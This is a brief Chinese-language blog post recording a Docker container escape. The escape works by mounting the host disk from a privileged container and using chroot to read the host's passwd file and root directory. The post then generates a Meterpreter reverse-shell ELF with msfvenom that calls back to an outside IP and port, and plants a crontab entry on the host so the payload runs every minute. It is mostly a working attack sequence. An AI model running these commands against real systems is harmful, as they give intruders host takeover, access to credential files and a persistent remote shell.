/1dreamGN/Blog

1dreamGN

记录一次内网docker逃逸

131
2023-11-21
记录一次内网docker逃逸

privileged 特权模式启动容器

1、启动特权容器

docker run -it --privileged ubuntu:18.04  

652d83de2777784354d267c7bee86160.png

2、挂在宿主机目录

fdisk -l  

93b9e1108f99deede13d2fe6be8916c7.png

可以直接挂载宿主机的磁盘

mkdir uzju mount /dev/sda3 uzju/ chroot /uzju/  

3ffc0d3cdbb5b29eda4475c885405e2d.png

查看宿主机的/etc/passwd

4f1b7311019912a6744cea0fb91f1650.png

查看root目录

331dc9b3373ac653e1837e4d1a624cb7.png72c3808a9943fa71159b8f8140612bb8.png

Tips: chroot命令 chroot命令 用来在指定的根目录下运行指令。chroot,即 change root directory (更改 root 目录)。在 linux 系统中,系统默认的目录结构都是以/,即是以根 (root) 开始的。而在使用 chroot 之后,系统的目录结构将以指定的位置作为/位置。 把根目录换成指定的目的目录。

授予木马权限:

chmod +x /uzju/root/shell.elf

MSF 监听上线:

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=47.94.236.117 LPORT=3333 -f elf > shell.elf

逃逸:

chmod +x /uzju/root/shell.elf

写入定时任务:

echo '*/1   root /root/shell.elf' >> /uzju/etc/crontab

之后可执行上线